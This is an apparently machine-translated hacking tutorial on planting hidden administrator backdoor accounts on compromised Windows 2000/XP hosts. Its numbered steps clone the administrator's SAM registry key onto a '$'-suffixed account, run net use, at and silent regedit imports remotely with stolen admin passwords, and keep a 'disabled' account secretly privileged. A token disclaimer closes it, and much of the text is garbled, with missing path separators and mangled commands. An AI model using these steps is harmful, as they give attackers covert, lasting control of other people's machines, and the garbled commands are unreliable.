Multiple methods to hide superusers in Win2000/XP

1. How to create hidden superusers on the graphic interface

The graphic interface is applicable to bots running local or 3389 Terminal Services. . In my opinion, this deployment will be applied to the psu.exe program. Because Windows2000 has two registry Editors: regedit.exeand regedt32.exe. In XP, regedit.exeand regedt32.exe are actually a program. You can right-click "permission" to modify the key value permission. Regedt32.exe can be used to set permissions for registry keys. NT/2000/users set the Sam key to "Full Control" for me. In this way, you can read and write the information in the SAM key. The steps are as follows:

1. Assume that we log on to a zombie with terminal services as a Super User administrator. First, create an account under the command line or account manager: hacker $, here I create this account under the command line

Net user hacker $1234/Add

2. Enter regedt32.exein the "Start/Run" command to run regedt32.exe.

3. Click "permission" and a window will pop up.

Click Add to add the account I logged on to the security bar. Here I log on as administrator, So I add the Administrator and set the permission to "full control ". Note: It is best to add the account you are logged on to or the group in which the account is located. do not modify the original account or group. Otherwise, a series of unnecessary problems may occur. And then click here to delete the account you added.

4. Click "start"> "run" and enter "regedit.exe" to go back to start the Registration Table editor regedit.exe.

Open key: hkey_local_maichinesamsamdomainsaccountusernameshacker $"

5. Export the items hacker $, 00000409, and 000001f4 as hacker. reg, 409.reg, 1f4. reg. use NotePad to edit the exported files respectively, and copy the value of the key "F" under the "000001f4" of the Super User, overwrite the value of the key "F" under item 00000409 corresponding to hacker $, and then replace 00000409. reg and hacker. reg merge.

6. Execute net user hacker $/del on the command line to delete user hacker $: Net user hacker $/del

7. In the regedit.exe window, press F5 to refresh, and then press file-import registry file to import modified hacker. reg to registry.

The hacker of the hidden Super User has been created. Then, disable regedit.exe. In the regedt32.exe window, change the hkey_local_machinesamsam Key Permission to the original one (you only need to delete the added account administrator ).

9. Note: After a hidden superuser is created, the hacker $ user cannot be seen in the account manager, and the hacker $ user cannot be seen in the command line by running the "Net user" command, but after the superuser is created, you cannot change the password any more. If you use the net user command to change the password of hacker $, you will be able to see this hidden super user in the account manager and cannot delete it.

2. How to remotely create hidden superusers under the command line

Here, we will use the command of "at.exe", because the scheduled task of "atsag" is to run with the System ID, and the psu.exe program will not be used. The method is also acceptable, as long as the Schedule service can be started.

For the command line method, you can use a variety of connection methods, such as using sqlexec to connect to port 1433 of MSSQL, or using Telnet service, as long as you can get a mongoshell, you can also run the AT command.

1. First, find a zombie. How to find it is not the topic I mentioned here. Assume that a super user with the administrator password and 12345678 is found. Now we can remotely create a hidden super user for the Super User under the command line. (In this example, the host is a host in my lan. I changed its IP address to 13.50.97.238. Do not block the host on the Internet to avoid disturbing the normal IP address .)

2. first establish a connection with the broiler. The command is: net use 13.50.97.238ipc $ "12345678"/User: "Administrator

3. Create a user on the chicken by using the atcommand (if the atservice is not started, use netsvc.exeor SC .exe to start it remotely): At 13.50.97.238

C: winntsystem32net.exe user hacker $1234/Add

Create the username with the $ character because after the $ character is added, the user is not displayed with the net user in the command line, but can be seen in the account manager.

4. Use the AT command to export the hkey_local_machinesamsamdomainsaccountusers key: At 13.50.97.238

C: winntregedit.exe/e hacker. Reg hkey_local_machinesamsamdomainsaccountusers

/E is the parameter of regedit.exe. The key in _ local_machinesamsamdomainsaccountusers must end. If necessary, you can quote "C: winntregedit.exe/e hacker. Reg hkey_local_machinesamsamdomainsaccountusers.

5. Download hacker. Reg from the bot to the local machine and use NotePad to open the edit command: Copy 13.50.97.238admin $ system32hacker. Reg

C: hacker. Reg

The graphic field of the modification method has already been introduced. I will not introduce it here.

6. Copy the edited hacker. Reg back to the zombie and copy C: hacker. Reg 13.50.97.238admin $ system32hacker1. Reg.

7. view the zombie time: Net time 13.50.97.238 and then run the AT command to delete the user hacker $:

At 13.50.97.238 13:40 net user hacker $/del

8. Verify whether hacker $ is deleted: Use

Net use 13.50.97.238/del disconnect the bot.

Net use 13.50.97.238ipc $ "1234"/User: "hacker $" Use the account hacker $ to connect to a zombie. If the connection fails, the connection is deleted.

9. Establish a connection with the zombie: net use 13.50.97.238ipc $ "12345678"/User: "Administrator"

After obtaining the zombie time, run the AT command to copy the hacker1.reg copy back to the zombie and import it to the zombie registry:

At 13.50.97.238 13:41 C: winntregedit.exe/s hacker1.reg

The parameter/s of regedit.exe indicates quiet mode.

10. Verify that hacker $ has been created. The method is the same as that for verifying that hacker $ is deleted.

11. Verify whether hacker $ has the read, write, and delete permissions. If you are not at ease, you can also verify whether other accounts can be created.

12. We can conclude through 11 that the user hacker $ has the superuser permission, because it was a common user when I used the AT command to create it, but now it has the permission to read, write, and delete data remotely.

3. What should I do if I don't want to use the command line service because I didn't enable the 3389 Terminal Service for bots?

In this case, you can also use the interface to remotely create hidden superusers for bots. To edit the remote registry. The account manager also provides the function of connecting to another computer. You can use the account manager to create and delete accounts for remote hosts. The specific steps are similar to those described above. I will not talk about them much, but its speed is really intolerable.

However, there are two prerequisites: 1. Use the net use broiler ipipc $ "password"/User: "Super User Name" to establish a connection with the remote host, and then use regedit.exe regedt32.exe and the account manager to connect to the remote host.

2. the remote host must enable the Remote Registry Service (you can also enable it remotely if it is not enabled because you have a superuser password ).

4. Use a Disabled Account to create a hidden superuser: we can use a forbidden user on a zombie to create a hidden superuser. The method is as follows:

1. Find out which users are forbidden by careful administrators. In general, some administrators usually disable guest for security reasons. Of course, other users are disabled. In the graphical interface, it is very easy to see that there is a red cross on the Disabled Account in the account manager; but under the command line, I have not come up with a good way, you can only run the "Net user username" command on the command line to check whether a user is disabled.

2. Here, we assume that the user hacker is disabled by the Administrator. First, I first used the super-user clone program ca.exe of small Banyan to clone the disabled user hacker into a Super User (After cloning, the disabled user hacker will be automatically activated): ca. EXE broiler IP administrator Superuser password hacher password.

3. If you have an existing shell, such as using telnet or sqlexec to connect to the default port 1433 of MSSQL for broilers, you can run the following command:

Net user hacker/active: No, so that the user hacker is disabled (at least on the surface). Of course, you can also change the user hacher to another disabled user.

4. If you look at the user in the account manager in the graphical interface, you will find that the user hacker is disabled, but is it actually like this? You can use this disabled user to connect to a zombie to see if it can be connected? Run the following command: Net user broiler ipipc $ "hacker password"/User: "hacker" to check whether the connection is continuous. I can tell you that, after many experiments, I have been able to succeed for the next time, and I am still a Super User Privilege.

5. What if there is no shell? You can use the AT command described above to Disable User hacker. Command Format: At broiler IP time net user hacker/active: No

6. Principle. You can disable Super User administrator in account manager on the graphic interface. A dialog box is displayed, and Super User administrator cannot be disabled. Similarly, when cloning, the "F" Key of hacker in the registry is replaced by the "f" Key of the Super User administrator in the registry. Therefore, hacker has the permissions of the Super User, however, because hacker still uses the original "C" key in the registry, hacker will still be disabled, but its super user permissions will not be disabled, therefore, the disabled user hacker can still connect to bots and has the permissions of Super Users. I cannot understand it either. You can understand it in this way.

5. Notes:

1. After a hidden superuser is created, the user is invisible in the account manager and in the command line, but the user exists.

2. After a hidden Super User is created, the password cannot be changed because the hidden Super User is exposed to the account manager and cannot be deleted.

3. When testing on the local machine, it is best to use the backup tool that comes with the system to back up the "system status" of the local machine first. This is mainly a registry backup, because I did the test, the account manager has never seen any users, nor any groups in the group, but they exist. Fortunately, I have a backup. The Sam key is, after all, the most sensitive part of the system.

4. This method is successfully tested on 2000/XP and not nt.

Note: This method is for research purposes only. Do not use this method for damage. Users are responsible for the use of this method to cause serious consequences. I am not responsible for this method.

This article from: dynamic website production (www.knowsky.com) Detailed reference: http://www.knowsky.com/339373.html